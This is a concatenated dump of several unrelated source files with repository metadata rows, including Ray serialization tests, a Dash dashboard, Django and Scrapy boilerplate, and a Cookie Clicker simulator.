BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = ([{
obj: obj
} for obj in PRIMITIVE_OBJECTS if (
obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
# Test StringIO serialization
s = io.StringIO(u"Hello, world!\n")
s.seek(0)
line = s.readline()
s.seek(0)
assert ray.get(ray.put(s)).readline() == line
def test_numpy_serialization(ray_start_regular):
array = np.zeros(314)
from ray.cloudpickle import dumps
buffers = []
inband = dumps(array, protocol=5, buffer_callback=buffers.append)
assert len(inband) < array.nbytes
assert len(buffers) == 1
def test_numpy_subclass_serialization_pickle(ray_start_regular):
class MyNumpyConstant(np.ndarray):
def __init__(self, value):
super().__init__()
self.constant = value
def __str__(self):
print(self.constant)
constant = MyNumpyConstant(123)
repr_orig = repr(constant)
repr_ser = repr(ray.get(ray.put(constant)))
assert repr_orig == repr_ser
def test_inspect_serialization(enable_pickle_debug):
import threading
from ray.cloudpickle import dumps_debug
lock = threading.Lock()
with pytest.raises(TypeError):
dumps_debug(lock)
def test_func():
print(lock)
with pytest.raises(TypeError):
dumps_debug(test_func)
class test_class:
def test(self):
self.lock = lock
from ray.util.check_serialize import inspect_serializability
results = inspect_serializability(lock)
assert list(results[1])[0].obj == lock, results
results = inspect_serializability(test_func)
assert list(results[1])[0].obj == lock, results
results = inspect_serializability(test_class)
assert list(results[1])[0].obj == lock, results
@pytest.mark.parametrize(
"ray_start_regular", [{
"local_mode": True
}, {
"local_mode": False
}],
indirect=True)
def test_serialization_final_fallback(ray_start_regular):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(ray_start_2_cpus):
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass:
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo:
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1:
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2:
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass:
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_returns=3)
def j():
class Class0:
def method0(self):
pass
c0 = Class0()
class Class0:
def method1(self):
pass
c1 = Class0()
class Class0:
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0:
def method0(self):
pass
c0 = Class0()
class Class0:
def method1(self):
pass
c1 = Class0()
class Class0:
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_deserialized_from_buffer_immutable(ray_start_shared_local_modes):
x = np.full((2, 2), 1.)
o = ray.put(x)
y = ray.get(o)
with pytest.raises(
ValueError, match="assignment destination is read-only"):
y[0, 0] = 9.
def test_reducer_override_no_reference_cycle(ray_start_shared_local_modes):
# bpo-39492: reducer_override used to induce a spurious reference cycle
# inside the Pickler object, that could prevent all serialized objects
# from being garbage-collected without explicity invoking gc.collect.
# test a dynamic function
def f():
return 4669201609102990671853203821578
wr = weakref.ref(f)
bio = io.BytesIO()
from ray.cloudpickle import CloudPickler, loads, dumps
p = CloudPickler(bio, protocol=5)
p.dump(f)
new_f = loads(bio.getvalue())
assert new_f() == 4669201609102990671853203821578
del p
del f
assert wr() is None
# test a dynamic class
class ShortlivedObject:
def __del__(self):
print("Went out of scope!")
obj = ShortlivedObject()
new_obj = weakref.ref(obj)
dumps(obj)
del obj
assert new_obj() is None
def test_buffer_alignment(ray_start_shared_local_modes):
# Deserialized large numpy arrays should be 64-byte aligned.
x = np.random.normal(size=(10, 20, 30))
y = ray.get(ray.put(x))
assert y.ctypes.data % 64 == 0
# Unlike PyArrow, Ray aligns small numpy arrays to 8
# bytes to be memory efficient.
xs = [np.random.normal(size=i) for i in range(100)]
ys = ray.get(ray.put(xs))
for y in ys:
assert y.ctypes.data % 8 == 0
xs = [np.random.normal(size=i * (1, )) for i in range(20)]
ys = ray.get(ray.put(xs))
for y in ys:
assert y.ctypes.data % 8 == 0
xs = [np.random.normal(size=i * (5, )) for i in range(1, 8)]
xs = [xs[i][(i + 1) * (slice(1, 3), )] for i in range(len(xs))]
ys = ray.get(ray.put(xs))
for y in ys:
assert y.ctypes.data % 8 == 0
def test_custom_serializer(ray_start_shared_local_modes):
import threading
class A:
def __init__(self, x):
self.x = x
self.lock = threading.Lock()
def custom_serializer(a):
return a.x
def custom_deserializer(x):
return A(x)
ray.util.register_serializer(
A, serializer=custom_serializer, deserializer=custom_deserializer)
ray.get(ray.put(A(1)))
ray.util.deregister_serializer(A)
with pytest.raises(Exception):
ray.get(ray.put(A(1)))
# deregister again takes no effects
ray.util.deregister_serializer(A)
def test_numpy_ufunc(ray_start_shared_local_modes):
@ray.remote
def f():
# add reference to the numpy ufunc
log
ray.get(f.remote())
class _SelfDereferenceObject:
"""A object that dereferences itself during deserialization"""
def __init__(self, ref: ray.ObjectRef):
self.ref = ref
def __reduce__(self):
return ray.get, (self.ref, )
def test_recursive_resolve(ray_start_shared_local_modes):
ref = ray.put(42)
for _ in range(10):
ref = ray.put(_SelfDereferenceObject(ref))
assert ray.get(ref) == 42
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
| [
"[email protected]"
] | |
87ee7c0dbbc0a3f5eb8ebfa7b0a3b4f8f8b4319b | b4824a127a50c617c90defa835161bfc9cd2faf3 | /other_Pro/dashboard_dark_theme.py | fbc4ef6804193aba61d5440fdc7a24e84175ec1b | [] | no_license | hj1996/cyse | 77a616939c880e6b8c5cf89b6dbbd4afcdf7eddc | 14ebbe37ec677f47c2cf07cbcb5293fc8b9c8791 | refs/heads/master | 2020-04-18T16:18:50.873180 | 2019-03-28T22:35:12 | 2019-03-28T22:35:12 | 167,631,085 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,837 | py | import os
import glob
import re
import json
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import pandas as pd
import plotly.graph_objs as go
import dash_table
app = dash.Dash(__name__)
def file_opener():
df = pd.read_csv("internettrafficreport-namerica--.csv")
return df
PAGE_SIZE = 5
df=file_opener()
app.layout = dash_table.DataTable(
id='table-sorting-filtering',
columns=[
{'name': i, 'id': i, 'deletable': True} for i in sorted(df.columns)
],
pagination_settings={
'current_page': 0,
'page_size': PAGE_SIZE
},
pagination_mode='be',
filtering='be',
filtering_settings='',
sorting='be',
sorting_type='multi',
sorting_settings=[]),html.Div(id='dark-theme-provider-demo', children=[
html.Br(),
daq.ToggleSwitch(
id='daq-light-dark-theme',
label=['Light', 'Dark'],
style={'width': '250px', 'margin': 'auto'},
value=False
)
@app.callback(
Output('table-sorting-filtering', 'data'),
[Input('table-sorting-filtering', 'pagination_settings'),
Input('table-sorting-filtering', 'sorting_settings'),
Input('table-sorting-filtering', 'filtering_settings')],
Output('dark-theme-component-demo', 'children'),
[Input('daq-light-dark-theme', 'value')]
)
def update_graph(pagination_settings, sorting_settings, filtering_settings):
filtering_expressions = filtering_settings.split(' && ')
dff = df
for filter in filtering_expressions:
if ' eq ' in filter:
col_name = filter.split(' eq ')[0]
filter_value = filter.split(' eq ')[1]
dff = dff.loc[dff[col_name] == filter_value]
if ' > ' in filter:
col_name = filter.split(' > ')[0]
filter_value = float(filter.split(' > ')[1])
dff = dff.loc[dff[col_name] > filter_value]
if ' < ' in filter:
col_name = filter.split(' < ')[0]
filter_value = float(filter.split(' < ')[1])
dff = dff.loc[dff[col_name] < filter_value]
if len(sorting_settings):
dff = dff.sort_values(
[col['column_id'] for col in sorting_settings],
ascending=[
col['direction'] == 'asc'
for col in sorting_settings
],
inplace=False
)
return dff.iloc[
pagination_settings['current_page']*pagination_settings['page_size']:
(pagination_settings['current_page'] + 1)*pagination_settings['page_size']
].to_dict('rows')
def change_bg(dark_theme):
if(dark_theme):
return {'background-color': '#303030', 'color': 'white'}
else:
return {'background-color': 'white', 'color': 'black'}
if __name__ == '__main__':
app.run_server(debug=True)
| [
"[email protected]"
] | |
c28f9064b7f66336abca56572c1f38ac8d1c8854 | b919a85a069299fbf119507eaae3859eac6dd62e | /xunit.py | ed527ebe4017a3ed0412c21a91e28182d9511509 | [] | no_license | nedbat/xunit_tools | f3c3b1f4647baac0b00c15ce65713cfb4f2f6209 | faba9f72dfc3b583f8b6dd4aedf320ffac9ac5e6 | refs/heads/master | 2023-06-22T04:25:10.299933 | 2015-10-26T21:12:17 | 2015-10-26T21:12:17 | 44,988,467 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,475 | py | """Python classes to help with xunit.xml structure."""
from lxml import etree
class Summable(object):
"""An object whose attributes can be added together easily.
Subclass this and define `fields` on your derived class.
"""
def __init__(self):
for name in self.fields:
setattr(self, name, 0)
@classmethod
def from_element(cls, element):
"""Construct a Summable from an xml element with the same attributes."""
self = cls()
for name in self.fields:
try:
setattr(self, name, int(element.get(name, "0")))
except Exception as ex:
raise ValueError("Couldn't read attribute %r from %.300s: %s" % (name, etree.tostring(element), ex))
return self
def onto_element(self, element):
"""Write the fields as attributes onto an xml element."""
for name in self.fields:
element.set(name, str(getattr(self, name)))
def __add__(self, other):
result = type(self)()
for name in self.fields:
setattr(result, name, getattr(self, name) + getattr(other, name))
return result
class TestResults(Summable):
"""A test result, makeable from a nosetests.xml <testsuite> element."""
fields = ["errors", "failures", "skip", "tests"]
def __str__(self):
msg = "{0.tests:4d} tests, {0.errors} errors, {0.failures} failures, {0.skip} skipped"
return msg.format(self)
| [
"[email protected]"
] | |
cb35a3d9d03fa30719c1c8f6bf01cf31f92a9fee | 6375f82cf4f760f4919c68beaac924afd5370c07 | /python/Activity13.py | ae6be1ad7552bf36b922c5f161cf607e3d8c5c0e | [] | no_license | mounika2583/sdet | 18af64dedf64926305c8210daedf9ddc7fa84224 | 938b56e9100c1300325d102de983b5952a58eb91 | refs/heads/main | 2023-03-17T04:38:13.147570 | 2021-03-04T17:21:55 | 2021-03-04T17:21:55 | 326,884,511 | 0 | 0 | null | 2021-01-05T04:20:34 | 2021-01-05T04:20:33 | null | UTF-8 | Python | false | false | 198 | py | list1=[5,25,76,13,50]
def list_sum(n):
sum=0
for num in n:
sum=sum+num
return sum
result = list_sum(list1)
print("The sum of all the elements is: " + str(result))
| [
"[email protected]"
] | |
1e9f246a71cab4edcf307250ab7f70937357d124 | ec1bd713b3631c6a7d41eecf57eef5979a6d4f4a | /krlbook/profiles/migrations/0002_relationship.py | 9dec92bb17bc1b109689f115b506d89d9021b47d | [] | no_license | cntrkilril/krlbook | e6c1a452a96f8dd7fa6ab6ec7c144e0f3a3e5a7c | 5ff142622ca7f2e3929d70b932c1273f76e6fddb | refs/heads/master | 2023-06-15T17:19:12.345739 | 2021-07-10T11:30:57 | 2021-07-10T11:30:57 | 381,473,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | # Generated by Django 3.2.4 on 2021-06-09 15:25
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('profiles', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Relationship',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(choices=[('send', 'send'), ('accepted', 'accepted')], max_length=8)),
('updated', models.DateTimeField(auto_now=True)),
('created', models.DateTimeField(auto_now_add=True)),
('receiver', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='receiver', to='profiles.profile')),
('sender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sender', to='profiles.profile')),
],
),
]
| [
"[email protected]"
] | |
be5d6241a7a447176cec2f980c304d72c8afcc7c | 6d9dacc72c57ea411794cf3b27a2862abf84d714 | /桌酷壁纸略缩图urllib库版/bizhi/middlewares.py | 7518e847fe99701e031159dd353b15255c6dce03 | [] | no_license | yzr0011/python-Scrapy- | 26a863e691c3601b539d7c548fb69a82d2279d06 | 9dc73a89897ef6680fa119eb01bfcd054ccd0474 | refs/heads/master | 2020-04-26T18:02:00.363389 | 2019-03-08T05:08:07 | 2019-03-08T05:08:07 | 173,732,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,595 | py | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class BizhiSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class BizhiDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
| [
"[email protected]"
] | |
bb724691a0396055e90f7b292abcda68fa16e597 | ee3e0a69093e82deff1bddf607f6ce0dde372c48 | /BOJ/random/BOJ_10808.py | 278786f83e00b57301f1cf5d8af039d5c2a68046 | [] | no_license | cndqjacndqja/algorithm_python | 202f9990ea367629aecdd14304201eb6fa2aa37e | 843269cdf8fb9d4c215c92a97fc2d007a8f96699 | refs/heads/master | 2023-06-24T08:12:29.639424 | 2021-07-24T05:08:46 | 2021-07-24T05:08:46 | 255,552,956 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | from string import ascii_lowercase
import sys
if __name__ == "__main__":
list = list(ascii_lowercase)
test = input()
result = []
for i in range(0, 26):
result.append(0)
for i in range(0, len(test)):
for j in range(0, len(list)):
if test[i] == list[j]:
result[j] += 1
print(result, end =' ') | [
"[email protected]"
] | |
817a382bdedb15f313bab3fe927c12c111637878 | 5edf699320f5e247cbcf9cbb3bc8dffb03d984e4 | /CL_2-1/main.py | e278628175ab6aad5c35f812075ae06ee2b69909 | [] | no_license | Livenai/LambTorch | 57c8d044803b221995d03f4220354a66161a7364 | a815a433deb89dfc75f5b27fe0e4ad4c20b520da | refs/heads/main | 2023-08-02T21:58:48.496148 | 2021-10-04T12:02:17 | 2021-10-04T12:02:17 | 341,551,821 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | import contest
import telegram_debugger
from telegram_debugger import sendMSG
import traceback
# PARAMETROS
NUM_NETWORKS = 50
try:
# Mensaje inicial
contest.sendStarMSG()
# Generamos las tareas
#contest.generateTasks(NUM_NETWORKS)
# Iniciamos el entrenamiento de las tareas
contest.trainRemainingTasks()
# Mostramos el ranking
contest.showRanking()
# Mensaje final
contest.sendFinalMSG()
except Exception as e:
# Enviamos el error al admin
sendMSG("ERROR", is_error=True)
sendMSG(traceback.format_exc(), is_error=True)
| [
"[email protected]"
] | |
5257783dbc07aa9fe08331b13d3c15a6db9fa904 | e1a0b03b213a08cc7ebe5776a9127a72341ea773 | /chapter_2_examples/standalone_files/parts_of_speech.py | 844bce0e175fa8cf214813db82649cc3ad56946b | [] | no_license | kobohuong/data_wrangling_exercises-1 | 9834107ca4b017af0b4afa704cbcdff2d8764c59 | fde4b2031f2ca5c52f159beb4ba8e5c2f2e6fab1 | refs/heads/main | 2023-07-07T19:04:17.110640 | 2021-08-09T02:15:03 | 2021-08-09T02:15:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | # A number is just digits
25
# A string is anything surrounded by matching quotation marks
"Hello World"
# A list is surrounded by square brackets, with commas between items
["this","is",1,"list"]
# An object is a set of key:value pairs, separated by commas and surrounded
# by curly braces
{"title":"Practical Python for Data Wrangling and Data Quality",
"format": "book",
"author": "Susan E. McGregor"
}
# A Boolean is a data type that has only two values, true and false.
True
| [
"[email protected]"
] | |
d43e510e6f94bd81847ca58aaafbf9f2ead1840c | 82f230d68f4fdd286a2a742f247bc6eff98077bd | /principles_of_computing/part1/week5/clicker_sim.py | d72b0d5116ffaed35d7f1c3278633500efc2e4b9 | [] | no_license | cshintov/Courses | b2c8ddc0081c25a939c0e99e5eac7ff8c86d4a9b | 191213bd3586270aca79dcfd6a7b1f225879cac1 | refs/heads/master | 2021-01-20T02:46:56.025084 | 2015-09-11T20:11:50 | 2015-09-11T20:11:50 | 42,266,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,047 | py | """
Cookie Clicker Simulator
"""
#import simpleplot
# Used to increase the timeout, if necessary
#import codeskulptor
#codeskulptor.set_timeout(20)
import poc_clicker_provided as provided
#from poc_testsuite import *
#from poc_clicker_provided import *
#from copy import deepcopy
from math import ceil
# Constants
SIM_TIME = 10000000000.0
class ClickerState:
"""
Simple class to keep track of the game state.
"""
def __init__(self):
self._total_cookies = 0.0
self._current_cookies = 0.0
self._current_time = 0.0
self._current_cps = 1.0
self._history = [(0.0, None, 0.0, 0.0)]
def __str__(self):
"""
Return human readable state
"""
state = ""
total = "{:20}".format(self._total_cookies)
state += "Total Cookies Produced: " + total + "\n"
cookies = "{:20f}".format(self._current_cookies)
state += "Cookies in bank: " + str(cookies) + "\n"
state += "Time Elapsed: " + str(self._current_time) + "\n"
state += "Current CPS: " + str(self._current_cps) + "\n"
return state
def get_cookies(self):
"""
Return current number of cookies
(not total number of cookies)
Should return a float
"""
return self._current_cookies
def get_cps(self):
"""
Get current CPS
Should return a float
"""
return self._current_cps
def get_time(self):
"""
Get current time
Should return a float
"""
return self._current_time
def get_history(self):
"""
Return history list
History list should be a list of tuples of the form:
(time, item, cost of item, total cookies)
For example: [(0.0, None, 0.0, 0.0)]
Should return a copy of any internal data structures,
so that they will not be modified outside of the class.
"""
return self._history
def time_until(self, cookies):
"""
Return time until you have the given number of cookies
(could be 0.0 if you already have enough cookies)
Should return a float with no fractional part
"""
reqd_time = 0.0
current_cookies = self.get_cookies()
if current_cookies < cookies:
cookies_needed = cookies - self.get_cookies()
reqd_time = ceil((cookies_needed) / self.get_cps())
return reqd_time
def wait(self, time):
"""
Wait for given amount of time and update state
Should do nothing if time <= 0.0
"""
if time > 0:
self._current_time += time
cookies_produced = time * self._current_cps
self._current_cookies += cookies_produced
self._total_cookies += cookies_produced
def buy_item(self, item_name, cost, additional_cps):
"""
Buy an item and update state
Should do nothing if you cannot afford the item
"""
if self._current_cookies >= cost:
self._current_cookies -= cost
self._current_cps += additional_cps
self._history.append((self._current_time, item_name, cost, self._total_cookies))
def simulate_clicker(build_info, duration, strategy):
"""
Function to run a Cookie Clicker game for the given
duration with the given strategy. Returns a ClickerState
object corresponding to the final state of the game.
"""
# Replace with your code
build = build_info.clone()
state = ClickerState()
while state.get_time() <= duration:
cookies = state.get_cookies()
cps = state.get_cps()
history = state.get_history()
time_left = duration - state.get_time()
item = strategy(cookies, cps, history, time_left, build)
if item is None:
state.wait(time_left)
break
cost, additional_cps = build.get_cost(item), build.get_cps(item)
required_time = state.time_until(cost)
if required_time > time_left:
state.wait(time_left)
break
state.wait(required_time)
state.buy_item(item, cost, additional_cps)
build.update_item(item)
return state
#run_suite(ClickerState)
def strategy_cursor_broken(cookies, cps, history, time_left, build_info):
"""
Always pick Cursor!
Note that this simplistic (and broken) strategy does not properly
check whether it can actually buy a Cursor in the time left. Your
simulate_clicker function must be able to deal with such broken
strategies. Further, your strategy functions must correctly check
if you can buy the item in the time left and return None if you
can't.
"""
return "Cursor"
def strategy_none(cookies, cps, history, time_left, build_info):
"""
Always return None
This is a pointless strategy that will never buy anything, but
that you can use to help debug your simulate_clicker function.
"""
return None
def item_costs(build_info):
""" gets the costs of the upgrades"""
items = build_info.build_items()
cost = build_info.get_cost
items = [(cost(item), item) for item in items]
items = sorted(items)
return items
def item_cps(build_info):
""" gets the costs of the upgrades"""
items = build_info.build_items()
getcps = build_info.get_cps
cost = build_info.get_cost
items = [(getcps(item), cost(item), item) for item in items]
items = sorted(items)
return items
def get_cheapest_item(build_info):
""" returns the cheapest item"""
items = item_costs(build_info)
return items[0]
def get_lowcps_item(build_info):
"""return teh lowest cps item"""
items = item_cps(build_info)
return items[0]
def get_costly_item(build_info):
""" returns the cheapest item"""
items = item_costs(build_info)
return items[-1]
def get_bigcps_item(build_info):
"""return the highest cps item"""
items = item_costs(build_info)
return items[-1]
def strategy_cheap(cookies, cps, history, time_left, build_info):
"""
Always buy the cheapest item you can afford in the time left.
"""
cheapest_item_cost, cheapest_item = get_cheapest_item(build_info)
max_possible = cookies + time_left * cps
if max_possible < cheapest_item_cost:
item = None
else:
item = cheapest_item
return item
def strategy_expensive(cookies, cps, history, time_left, build_info):
"""
Always buy the most expensive item you can afford in the time left.
"""
items = item_costs(build_info)
max_possible = cookies + time_left * cps
items = [item for item in items if item[0] <= max_possible]
if len(items) is 0:
item = None
else:
item = items[-1][1]
return item
def strategy_best_a(cookies, cps, history, time_left, build_info):
"""
The best strategy that you are able to implement.
"""
last_purch_item = history[-1][1]
max_possible = cookies + time_left * cps
items = item_costs(build_info)
items = [itema[1] for itema in items if itema[0] <= max_possible]
if last_purch_item == None or last_purch_item not in items:
item = strategy_cheap(cookies, cps, history, time_left, build_info)
return item
if last_purch_item in items :
index = items.index(last_purch_item)
if index == len(items) - 1:
item = last_purch_item
return item
cost_next_item = build_info.get_cost(items[index+1])
cost_item = build_info.get_cost(last_purch_item)
if cost_item < (0.86 * cost_next_item):
item = last_purch_item
else:
item = items[index+1]
return item
from random import choice
def strategy_best(cookies, cps, history, time_left, build_info):
"""
The best strategy that you are able to implement.
"""
total_possile = cookies + cps * time_left
def cost_per_cps_ratio(item):
item_cps = build_info.get_cps(item)
item_cost = build_info.get_cost(item)
ratio = item_cost / item_cps
return ratio
def test_option(item):
cost = build_info.get_cost(item)
max_cookies = cookies + cps * time_left
return cost <= max_cookies
options = [(cost_per_cps_ratio(item), item) for item in build_info.build_items() if test_option(item)]
if len(options) == 0:
return None
return min(options)[1]
#run_suite(simulate_clicker, strategy_expensive)
def run_strategy(strategy_name, time, strategy):
"""
Run a simulation for the given time with one strategy.
"""
state = simulate_clicker(provided.BuildInfo(), time, strategy)
print strategy_name, ":", state
#his = state._history
#for item in his:
# print 'time , item , cost, totalcook'
# print item
# Plot total cookies over time
# Uncomment out the lines below to see a plot of total cookies vs. time
# Be sure to allow popups, if you do want to see it
# history = state.get_history()
# history = [(item[0], item[3]) for item in history]
# simpleplot.plot_lines(strategy_name, 1000, 400, 'Time', 'Total Cookies', [history], True)
def run():
"""
Run the simulator.
"""
#run_strategy("Cursor", SIM_TIME, strategy_cursor_broken)
# Add calls to run_strategy to run additional strategies
#run_strategy("Cheap", SIM_TIME, strategy_cheap)
#run_strategy("Expensive", SIM_TIME, strategy_expensive)
run_strategy("Best", SIM_TIME, strategy_best)
#run_strategy("Best", SIM_TIME, strategy_best_a)
run()
| [
"[email protected]"
] | |
13aaaee148414fb08769b258edea12d0a8b27cda | 8c2f5e25e3b4fc1ab6a39b954cefba54121db2f4 | /Cricket_pro/urls.py | 517b2f1cca22b4ecaad51bff8d543c8e6e1ee6fb | [] | no_license | gopal8688/cricket_assignment | 8d065feb2b9ddcd07debd2ae259aec0e08fe3ccb | 8bd52df4cd3e6aa59fc1bd3aed916fd337ab7fac | refs/heads/master | 2022-11-15T18:05:44.249388 | 2020-07-04T11:24:08 | 2020-07-04T11:24:08 | 277,095,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,328 | py | """cricket_team URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from Cricket_pro import settings
from django.conf.urls.static import static
from cricket_app import views
from django.views.generic import TemplateView
urlpatterns = [
path('admin/', admin.site.urls),
path('team/', views.Show_Team.as_view(), name='team'),
path('player/', views.Show_palyer.as_view(), name='player'),
path('match/', views.Match.as_view(), name='match'),
path('points/', views.Show_Points.as_view(), name='points'),
path('', TemplateView.as_view(template_name='home.html'),name='home'),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"[email protected]"
] | |
c5e2cd700543d8067f8c110dadae755ae3ea69a4 | d99b6737585bc25cbd85870a75859adff0f728d0 | /ICP6/venv/Scripts/easy_install-3.7-script.py | 32c9c58b93a1a8400889eb2c53e26dafb4c07863 | [] | no_license | RupeshDoddala/Python | 04e9e8eba30d99bd3da477dba6a16f135c0eb212 | 37f5a9e7c6128162f56894528611033eccd527c6 | refs/heads/master | 2020-04-18T16:14:03.356609 | 2019-05-03T22:53:12 | 2019-05-03T22:53:12 | 167,629,462 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | #!C:\Users\RupeshD\PycharmProjects\ICP6\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
fa4b4047e1713b9e279672112999c91f38a555be | fde31c7067082b6340154bece06acbb8793124f7 | /cricket/cricscore/abc.py | 8d1a78173971101d9d54f95add2052d566962d90 | [] | no_license | nikkkkhil/Cricket-Web-App | 1b245d77b0b845b17777bba512f458c92805fecf | bc28990fc30d4594b115884aa1dd323d01274322 | refs/heads/master | 2022-12-18T16:04:23.914205 | 2019-05-26T14:20:22 | 2019-05-26T14:20:22 | 134,660,557 | 4 | 0 | null | 2022-12-08T00:57:52 | 2018-05-24T04:22:49 | HTML | UTF-8 | Python | false | false | 1,007 | py | import re
import pytz
import requests
import datetime
from bs4 import BeautifulSoup
